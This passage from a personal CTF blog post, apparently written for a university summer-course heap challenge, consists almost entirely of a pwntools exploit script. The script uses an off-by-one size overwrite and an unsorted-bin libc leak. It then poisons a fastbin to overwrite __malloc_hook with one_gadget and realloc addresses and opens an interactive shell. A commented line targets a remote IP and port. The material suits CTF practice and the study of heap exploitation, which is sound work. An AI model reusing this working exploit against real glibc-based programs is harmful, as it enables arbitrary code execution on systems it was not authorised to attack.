class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#r = remote(&#x27;106.14.112.162&#x27;,&#x27;10013&#x27;)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment">#e = ELF(&#x27;./pwn&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>():</span></span><br><span class="line">    gdb.attach(r)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">    <span class="comment">#r.recvuntil()</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">length,name</span>):</span></span><br><span class="line">    r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">    r.sendline(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">    r.send(<span class="built_in">str</span>(length))</span><br><span class="line">    r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">    r.send(name)</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span>(<span class="params">index,length,name</span>):</span></span><br><span class="line">	r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">	r.sendline(<span class="string">&quot;3&quot;</span>)</span><br><span class="line">	r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">	r.send(<span class="built_in">str</span>(index))</span><br><span class="line">	r.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">	r.send(<span class="built_in">str</span>(length))</span><br><span class="line">	r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">	r.send(name)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">remove</span>(<span class="params">index</span>):</span></span><br><span class="line">	r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">	r.sendline(<span class="string">&quot;4&quot;</span>)</span><br><span class="line">	r.recvuntil(<span class="string">&quot;item:&quot;</span>)</span><br><span class="line">	r.send(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#add(0x10,&quot;aaaa&quot;)</span></span><br><span class="line"><span class="comment">#add(0x68,&quot;bbbb&quot;) # - 0</span></span><br><span class="line"><span class="comment">#add(0x80,&quot;bbbb&quot;)</span></span><br><span class="line"><span class="comment">#add(0x18,&quot;cccc&quot;) # - 1 in case of 0 is merged to top chunk when free 0</span></span><br><span class="line"><span class="comment">#remove(0)</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#add(0x80,b&#x27;\x61&#x27;)</span></span><br><span class="line"><span class="comment">#add(0x80,&quot;&quot;)</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"><span class="comment">#show()</span></span><br><span class="line"><span class="comment">#r.recvuntil()</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p = p64(0x0)</span></span><br><span class="line"><span class="comment">#p += p64()</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 0</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 1</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 2</span></span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;cccc&#x27;</span>) <span class="comment"># 3</span></span><br><span class="line"><span class="comment">#add(0x10,&#x27;bbbb&#x27;) # 4 </span></span><br><span class="line"></span><br><span class="line">change(<span class="number">0</span>, <span class="number">0x19</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span> + <span class="string">b&#x27;\xe1&#x27;</span>)</span><br><span class="line">remove(<span class="number">1</span>) <span class="comment"># 1 and 2 removed</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;aaaa&quot;</span>) <span class="comment"># 1 was malloced </span></span><br><span class="line">show()</span><br><span class="line">r.recvuntil(<span class="string">&quot;2 : &quot;</span>) <span class="comment"># pointer 2 is still point to #2 and #2 is still in unsorted bin</span></span><br><span class="line">libc_base = u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - (<span class="number">0x7f1442c64b78</span> - <span class="number">0x7f14428a0000</span>) <span class="comment"># hou mian liang ge wo shi cong mou yi ci zhixing guocheng zhong nong chulai de</span></span><br><span class="line"><span class="comment">#print hex(libc_base)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#print hex(e.got[&#x27;puts&#x27;])</span></span><br><span class="line"></span><br><span class="line">malloc_hook_addr = libc_base + libc.symbols[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">realloc_addr = libc_base + libc.symbols[<span class="string">&#x27;realloc&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(realloc_addr)</span><br><span class="line">one = [<span class="number">0x45226</span>, <span class="number">0x4527a</span>, <span class="number">0xf03a4</span>, <span class="number">0xf1247</span>]</span><br><span class="line">add(<span class="number">0x60</span>, <span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># 4 ba unsorted bin li mian qu chu lai equals to #2</span></span><br><span class="line">remove(<span class="number">4</span>) <span class="comment"># put #4 into fast bin</span></span><br><span class="line"><span class="comment">#p = p64(0)</span></span><br><span class="line"><span class="comment">#p += p64(0xd1)</span></span><br><span class="line">p = p64(malloc_hook_addr - <span class="number">0x23</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(malloc_hook_addr - <span class="number">0x23</span>)</span><br><span class="line"><span class="comment">#print hex(libc_base + one[0])</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">p += p64(libc_base + one[0] - 0x10)</span></span><br><span class="line"><span class="string">print libc_base + one[0] - 0x10</span></span><br><span class="line"><span class="string">p += &#x27;d&#x27;*0xb0</span></span><br><span class="line"><span class="string">p += p64(0xd0)</span></span><br><span class="line"><span class="string">p += p64(0x80)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">change(<span class="number">2</span>, <span class="number">0x08</span>, p) <span class="comment"># equals to change 4</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># get #4</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">add(<span class="number">0x60</span>, <span class="string">&#x27;aaaa&#x27;</span>) <span class="comment"># get malloc_hook -0x23 as #5</span></span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">print r.recvuntil(&quot;choice:&quot;)</span></span><br><span class="line"><span class="string">r.sendline(&quot;2&quot;)</span></span><br><span class="line"><span class="string">print r.recvuntil(&quot;name:&quot;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">r.send(str(0x60))</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">r.recvuntil(&quot;item:&quot;)</span></span><br><span class="line"><span class="string">r.send(name)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">change(<span class="number">5</span>, <span class="number">0xb</span> + <span class="number">0x8</span> + <span class="number">0x8</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">0xb</span> + p64(libc_base + one[<span class="number">1</span>]) + p64(realloc_addr))</span><br><span class="line"><span class="comment">#change(0,0,&quot;&quot;)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"><span class="comment">#remove(3)</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#r.recvuntil(&quot;choice:&quot;)</span></span><br><span class="line"><span class="comment">#r.sendline(&quot;7&quot;)</span></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">r.recvuntil(<span class="string">&quot;choice:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">r.send(<span class="built_in">str</span>(<span class="number">0x20</span>))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="最后一段用于查找md源文件以便修改"><a href="#最后一段用于查找md源文件以便修改" class="headerlink" title="最后一段用于查找md源文件以便修改"></a>最后一段用于查找md源文件以便修改</h2><blockquote>
<p>//文档查找：复旦白泽暑期课程-heap-题-第一题.md</p>
</blockquote>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>HaveYouTall</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://haveyoutall.github.io/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/">https://haveyoutall.github.io/2021/08/11/%E5%A4%8D%E6%97%A6%E7%99%BD%E6%B3%BD%E6%9A%91%E6%9C%9F%E8%AF%BE%E7%A8%8B-heap-%E9%A2%98-%E7%AC%AC%E4%B8%80%E9%A2%98/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2022 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>If you read this, then you must have read this already. lol~~~</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/ctf-pwn/"># ctf-pwn</a>
                    
                        <a href="/tags/heap/"># heap</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2021/08/11/ubuntu16-ruby/">ubuntu16-ruby-安装问题</a>
            
            
            <a class="next" rel="next" href="/2021/07/30/hello-world/">hexo博客搭建问题记录</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© HaveYouTall | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>